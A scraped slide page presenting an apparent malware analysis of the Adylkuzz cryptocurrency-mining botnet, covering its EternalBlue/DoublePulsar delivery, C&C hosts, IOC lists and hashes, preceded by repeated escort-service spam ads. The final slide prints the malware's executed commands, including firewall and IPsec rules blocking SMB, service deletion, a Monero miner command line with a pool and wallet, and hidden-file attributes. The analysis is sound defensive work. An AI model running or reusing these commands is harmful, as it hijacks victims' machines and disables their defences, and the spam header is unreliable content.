(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 

Adylkuzz a Cryptocurrency-mining Botnet

  • 1. Adylkuzz is a cryptocurrency-mining botnet discovered by security firm Proofpoint in May 2017 as the company's analysts were attempting to conduct research on the WannaCry ransomware campaign. The analysts deliberately exposed a vulnerable system to the EternalBlue exploit in an attempt to infect it with a sample of the WannaCry ransomware variant. However, within 20 minutes of the exposure, the vulnerable system became infected with Adylkuzz. They determined that the botnet attack was launched from several virtual private servers tasked with scanning the internet for vulnerable systems that had TCP port 445 exposed. Once a vulnerable system was successfully exploited with EternalBlue, it is then infected with DoublePulsar, a kernel DLL injection technique that creates a backdoor. DoublePulsar then downloads Adylkuzz from an external host and runs it. Once launched, Adylkuzz will first terminate any instances of itself that are already running on the system and block SMB traffic preventing new infections, including those resulting from WannaCry. It then collects the public IP address of the victim and downloads the cryptocurrency mining software, mining instructions, and cleanup tools. Analysts determined that this attack was designed to mine Monero, a cryptocurrency that's touted as a more secure and anonymous alternative to Bitcoin. Working flow of Adylkuzz: DOUBLEPULSAR delivering Adylkuzz observed incoming connections listening port 445 from unfamiliar remote locations:
  • 2. Incoming connections over SMB observed attempting to deliver DOUBLEPULSAR The payload delivering the crypto-currency botnet was executed immediately after the end of the incoming connection, which confirms the use of the DoublePulsar exploit. The exploit infects a legitimate Windows service and runs a downloader to fetch the payload. Below are details of the infected service, resolved DNS queries, and the connected IPs.
  • 3. The above data shows that the DOUBLEPULSAR backdoor downloaded the Adylkuzz botnet, using svchost.exe (Diagnostic Tracking Service) directly from 45(.)77.41.231. While examining this IP address, we noticed that it is linked to ShadowBrokers / Equation payloads that were detected by multiple antivirus vendors. https://virustotal.com/en/ip-address/45.77.41.231/information/ https://virustotal.com/en/file/b704dd388be29de7a33e2a806dc1dfb391a8f 22f0b8f5f4c858f9fcf18455288/analysis/
  • 4. The Adylkuzz botnet execution Once downloaded and installed by DOUBLEPULSAR, the Adylkuzz botnet runs as a service (sppsrv.exe) with SYSTEM privileges and takes the following actions:  Check internet connectivity using a known IP service  Communicate with Adylkuzz C&C server  Downloads the Monero cryptocurrency miner and additional tools Monero Crypto Currency Miner
  • 5. lms.exe – c3fbd25209ca8aff4a50106226713afc3c970143 The lms.exe process is responsible for the Monero cryptocurrency mining, as can be seen in the command line: DNS requests made to the Monero mining pool server:
  • 6. Adylkuzz executes additional tool and commands:
  • 7. Adylkuzz will also download an additional tool (s9u8.1_.exe – e40811db66973dd7d2be2f5eb5d5f0ed824a1a3b) that runs a long series of commands. This includes commands that ensure that the malware won’t have any “competition” coming from potential additional infections originating from the same SMB exploit. This is done by creating a Windows firewall rule that blocks connections running on port 445 (default SMB port): Observed binary files Observed domains and IPs g.disgogoweb.com > 104.24.120.122 (Adylkuzz C&C server) xmr.crypto-pool.fr > 212.129.46.87 (Monero Crypto Pool Miner) icanhazip.com – checking internet connectivity and geo-location
  • 8. Indicators of Compromise Selection of Domain/IP Address Date Comment 45.32.52[.]8 2017-05-16 Attacking host 45.76.123[.]172 2017-05-16 Attacking host 104.238.185[.]251 2017-05-16 Attacking host 45.77.57[.]194 2017-05-14 Attacking host 45.76.39[.]29 2017-05-15 Attacking host 45.77.57[.]36 2017-05-15 Attacking host 104.238.150[.]145 2017-05-14 Server hosting the payload binary 08.super5566[.]com 2017-05-14 Adylkuzz C&C a1.super5566[.]com 2017-05-02 Adylkuzz C&C aa1.super5566[.]com 2017-05-01 Adylkuzz C&C lll.super1024[.]com 2017-04-24 Adylkuzz C&C 07.super5566[.]com 2017-04-30 Adylkuzz C&C am.super1024[.]com 2017-04-25 Adylkuzz C&C 05.microsoftcloudserver[.]com 2017-05-12 Adylkuzz C&C d.disgogoweb[.]com 2017-04-30 Adylkuzz C&C panel.minecoins18[.]com 2014-10-17 Adylkuzz C&C in 2014 wa.ssr[.]la 2017-04-28 Adylkuzz C&C 45.77.57[.]190 2017-05-15 Host presenting same signature as attackers 45.77.58[.]10 2017-05-15 Host presenting same signature as attackers 45.77.58[.]40 2017-05-15 Host presenting same signature as attackers 45.77.58[.]70 2017-05-15 Host presenting same signature as attackers 45.77.56[.]87 2017-05-15 Host presenting same signature as attackers 45.77.21[.]159 2017-05-15 Attacking Host 45.77.29[.]51 2017-05-15 Host presenting same signature as attackers 45.77.31[.]219 2017-05-15 Host presenting same signature as attackers 45.77.5[.]176 2017-05-15 Host presenting same signature as attackers 45.77.23[.]225 2017-05-15 Host presenting same signature as attackers 45.77.58[.]147 2017-05-15 Host presenting same signature as attackers 45.77.56[.]114 2017-05-15 Host presenting same signature as attackers 45.77.3[.]179 2017-05-15 Host presenting same signature as attackers 45.77.58[.]134 2017-05-15 Host presenting same signature as attackers 45.77.59[.]27 2017-05-15 Host presenting same signature as attackers Hash Values SHA-256 Date Comment 29d6f9f06fa780b7a56cae0aa888961b8bdc559500421f3bb3b97f3dd94797c2 2017-05-14 Pcap of the attack (filtered and a bit sanitized) 8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf2332017-05-14 Adylkuzz.B spread via EB/DP 450cb5593d2431d00455cabfecc4d28d42585789d84c25d25cdc5505189b4f9f 2017-04-24 Adylkuzz.A (we are not sure that instance was spread via EB/DP) a7000b2618512f1cb24b51f4ae2f34d332b746183dfad6483aba04571ba8b2f9 2017-05-14 s2bk.1_.exe e96681456d793368a6fccfa1321c10c593f3527d7cadb1ff462aa0359af61dee 2017-05-14 445.bat (? seems to cleanup old variant of the coin miner and stop windows Update) e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 2017-05-14 Msiexev.exe Bitcoin miner process 55622d4a582ceed0d54b12eb40222bca9650cc67b39f74c5f4b78320a036af88 2017-05-02 Bitcoin miner process 6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3 2017-05-15 Adylkuzz.B spread via EB/DP fab31a2d44e38e733e1002286e5df164509afe18149a8a2f527ec6dc5e71cb00 2014-10-17 An old version of Adylkuzz d73c9230811f1075d5697679b6007f5c15a90177991e238c5adc3ed55ce049882017-05-15 Adylkuzz.B spread via EB/DP
  • 9. Executed commands: taskkill /f /im hdmanager.exe C:Windowssystem32wbemwmiprvse.exe -secured -Embedding taskkill /f /im mmc.exe sc stop WELM sc delete WELM netsh ipsec static add policy name=netbc netsh ipsec static add filterlist name=block netsh ipsec static add filteraction name=block action=block netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445 netsh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block netsh ipsec static set policy name=netbc assign=y C:WindowsFontswuauser.exe --server C:WindowsFontsmsiexev.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 49v1V2suGMS8JyPEU5FTtJRTHQ9YmraW7Mf2btVCTxZuEB8EjjqQz3i8vECu7XCgvUfiW6NtSRewn HF5MNA3LbQTBQV3v9i -p x -t 1 C:WindowsTEMPs2bk.1_.exe /stab C:WindowsTEMPs2bk.2_.log taskkill /f /im msiexev.exe netsh advfirewall firewall delete rule name="Chrome" netsh advfirewall firewall delete rule name="Windriver" netsh advfirewall firewall add rule name="Chrome" dir=in program="C:Program FilesGoogleChromeApplicationchrome.txt" action=allow netsh advfirewall firewall add rule name="Windriver" dir=in program="C:Program FilesHardware Driver Managementwindriver.exe" action=allow C:Windows445.bat C:Windowssystem32PING.EXE ping 127.0.0.1 net stop Windows32_Update attrib +s +a +r +h wuauser.exe C:Windowssystem32SecEdit.exe secedit /configure /db C:Windowsnetbios.sdb C:Windowssystem32net1 stop Windows32_Update